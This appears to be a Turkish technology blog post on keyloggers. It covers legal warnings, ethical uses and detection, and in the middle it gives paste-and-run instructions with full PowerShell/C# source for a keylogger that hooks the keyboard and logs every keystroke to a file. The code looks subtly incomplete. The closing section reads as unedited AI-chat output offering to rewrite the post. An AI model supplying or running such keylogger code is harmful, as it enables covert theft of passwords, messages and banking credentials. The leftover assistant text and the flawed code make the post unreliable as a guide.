# önder online
Teknoloji ve siber güvenlik dünyasına hoş geldiniz Güncel siber tehditler ve korunma yöntemleri Yapay zekâ ve otomasyonun güvenliğe etkileri Microsoft 365 ve Active Directory güvenlik rehberleri Yazılım geliştirmede güvenlik odaklı yaklaşımlar Teknoloji ve siber güvenlik dünyasına hoş geldiniz Güncel siber tehditler ve korunma yöntemleri

Menu

Bizi Takip Edin

Sistem

Bilgisayarınızda kendi basit keylogger'ınızı oluşturmak

Bilgisayarınızda kendi basit keylogger'ınızı oluşturmak
23 Nov 2023 Sistem 710 6 dakika okuma

Bilgisayarınızda kendi basit keylogger'ınızı oluşturmak

 

 Keylogger Nedir? Güvenlik, Etik ve Yasal Perspektiften Detaylı İnceleme

Bilgisayar güvenliği dünyasında sıkça duyulan terimlerden biri keyloggerdır. Keylogger, bir cihazda yapılan klavye tuş basışlarını kaydeden yazılımlara verilen genel addır. Bu yazılımlar, kötü niyetli amaçlarla kullanılabileceği gibi bazı özel senaryolarda güvenlik kontrolü için de kullanılabilir. Fakat bu tür yazılımların kullanımı sıkı biçimde yasal düzenlemelere tabidir.

Bu yazıda keylogger kavramının ne olduğu, neden riskli olduğu, yasal sonuçları, etik kullanım örnekleri ve sistem güvenliği açısından nasıl tespit edildiği gibi kritik konulara değineceğiz.

🔍 Keylogger Nedir?

Keylogger (keystroke logger), kullanıcı farkında olmadan klavye üzerinden yapılan tuş basışlarını kayıt altına alan yazılımdır. Kayıt altına alınan bilgiler arasında:

  • Parolalar

  • Kullanıcı adları

  • Özel mesajlar

  • Bankacılık giriş bilgileri

  • Kişisel notlar

gibi son derece hassas veriler bulunabilir.

Bu nedenle keylogger'lar çoğunlukla siber saldırılarda kullanılan zararlı yazılım türleri arasında yer alır.

⚖️ Yasal Uyarı: Keylogger Kullanımı Suç olabilir

Bir keylogger'ı kendi bilgisayarınızda bile kullanmadan önce ülkenizdeki yasaları incelemek zorundasınız.
Çünkü birçok ülkede (Türkiye dahil):

✔ Başkasının cihazına rızası olmadan keylogger kurmak ağır bir suçtur.
✔ 1 yıldan başlayan hapis cezaları ve ciddi para cezaları uygulanabilir.
✔ Kurumsal cihazlara izinsiz yüklemek işten çıkarılma ve tazminat süreçlerine yol açabilir.

Rızası olmayan üçüncü kişilerin verilerini izlemek – tamamen yasa dışıdır.

 Powershell, .NET çerçevesi üzerine inşa edilmiştir ve çeşitli uygulamalar için yaygın olarak kullanılmaktadır.

  • Başlat menüsünü açın. Yazın Windows PowerShell arama çubuğuna. Arama sonuçlarından, ekran görüntüsünde gösterildiği gibi Windows PowerShell ve Windows PowerShell ISE uygulamalarını açın .
  • Aşağıda verilen kodu kopyalayın ve Windows PowerShell komut istemine yapıştırın . Kopyalamak veya yapıştırmak için, PowerShell komut isteminde kodu seçmeniz ve sağ tıklamanız yeterlidir.
  • Şimdi bazı uygulamaları açın ve bazı tuşlara basın. Örnek olarak ondermonder yazdım
  • Tuşlara basmayı tamamladığınızda, Windows PowerShell komut isteminde kodun altına bakın . Burada, Kayıt tuşuna bastığınız bir talimat göreceksiniz . Sonuçları görmek için CTRL + C tuşlarına basın. Günlüğe kaydedilen tuş vuruşlarını görmek için talimata göre CTRL + C tuşlarına basın .

 

Add-Type -TypeDefinition @” using System; 
using System.IO; using System.Diagnostics; 
using System.Runtime.InteropServices; 
using System.Windows.Forms; namespace KeyLogger { public static class Program { private const int WH_KEYBOARD_LL = 13; private const int WM_KEYDOWN = 0x0100; 
private const string logFileName = “log.txt”; private static StreamWriter logFile; 
private static HookProc hookProc = HookCallback; 
private static IntPtr hookId = IntPtr.Zero; 
public static void Main() { logFile = File.AppendText(logFileName); 
logFile.AutoFlush = true; 
hookId = SetHook(hookProc); 
Application.Run(); 
UnhookWindowsHookEx(hookId); } 
private static IntPtr SetHook(HookProc hookProc) { IntPtr moduleHandle = GetModuleHandle(Process.GetCurrentProcess().MainModule.ModuleName); 
return SetWindowsHookEx(WH_KEYBOARD_LL, hookProc, moduleHandle, 0); }
private delegate IntPtr HookProc(int nCode, IntPtr wParam, IntPtr lParam); 
private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam) { if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN) { int vkCode = Marshal.ReadInt32(lParam); logFile.WriteLine((Keys)vkCode); } return 
CallNextHookEx(hookId, nCode, wParam, lParam); } private static extern IntPtr SetWindowsHookEx(int idHook, HookProc lpfn, IntPtr hMod, uint dwThreadId); private static extern bool UnhookWindowsHookEx(IntPtr hhk); private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam); 
private static extern IntPtr GetModuleHandle(string lpModuleName); } } “@ -ReferencedAssemblies System.Windows.Forms ::Main();

🎯 Keylogger’ların Etik Kullanım Senaryoları

Bazı profesyonel alanlarda keylogger benzeri araçlar kontrollü ve yasal çerçevede kullanılabilir:

✔ 1. Kurumsal Güvenlik Testleri

Yetkilendirilmiş sızma testi uzmanları, belirli güvenlik açıklarını göstermek için kontrollü ortamda keylogging davranışını simüle edebilir.

✔ 2. Ebeveyn Denetim Yazılımları

Bazı ebeveyn kontrol uygulamaları, çocukların çevrimiçi güvenliği için sınırlı ölçüde tuş kayıtlarını izler. Bu durumda yasal rıza bulunur.

✔ 3. Kişisel Güvenlik Testleri

Kendi cihazında, kendi verilerini görmek veya güvenlik farkındalığı için test amaçlı kullanım mümkündür.

🧠 Keylogger’lar Nasıl Çalışır? (Teknik Olmayan Özet)

Keylogger yazılımları temel olarak şu yöntemlerle çalışır:

  • Klavye olaylarını takip etme
    (işletim sisteminde klavye hook mekanizmalarını dinler)

  • Ekran görüntüsü alma

  • Panoya (clipboard) kopyalanan metni kaydetme

  • Arka planda çalışan sessiz servis veya uygulama

  • Kayıtları dosya veya uzak sunucuya aktarma

Bu çalışma biçimi nedeniyle güvenlik yazılımları keylogger’ları sık sık “yüksek riskli” olarak işaretler.

🛡️ Keylogger’lar Nasıl Tespit Edilir?

Modern antivirüsler ve EDR çözümleri genelde keylogger davranışlarını şu yöntemlerle tespit eder:

  • Düşük seviyeli klavye hook girişimlerini izleme

  • Şüpheli süreç davranışlarını takip etme

  • Uygulamanın gizli modda arka planda çalışmasını analiz etme

  • Kayıt dosyası oluşturma aktivitelerini inceleme

Kullanıcıların kendi cihazlarını koruması için:

✔ Güncel antivirüs kullanmak
✔ Bilinmeyen programları yüklememek
✔ Tarayıcı eklentilerini kontrol etmek
✔ Arka planda çalışan işlemleri düzenli incelemek

tavsiye edilir.

📌 Sonuç: Keylogger Geliştirmek veya Kullanmak Büyük Sorumluluk Gerektirir

Keylogger teknolojisi sadece teknik bir konu değildir; etik, hukuki ve güvenlik boyutları vardır.
Bu yazı, keylogger yapmayı öğretmek için değil, bu teknolojinin ne kadar hassas olduğunu ve yanlış kullanımın ciddi sonuçlar doğuracağını anlatmak amacıyla hazırlanmıştır.

Eğer cihaz güvenliği, sızma testi, zararlı yazılım analizi veya dijital adli tıp konularına ilgin varsa — bu alanlarda etik ve yasal sınırlar içinde bilgi vermeye devam edebilirim.

✍️ İstersen Bu Yazıyı Daha da Geliştirebilirim

Hazırlayabilirim:

  • Daha uzun bir blog versiyonu

  • SEO uyumlu başlıklar ve meta açıklamalar

  • Markdown veya WordPress uyumlu format

  • “Keylogger nasıl tespit edilir?” odaklı teknik bir yazı

  • Alternatif olarak Klavye olaylarını loglamayan güvenli denetim araçları rehberi

 

İlgili Yazılar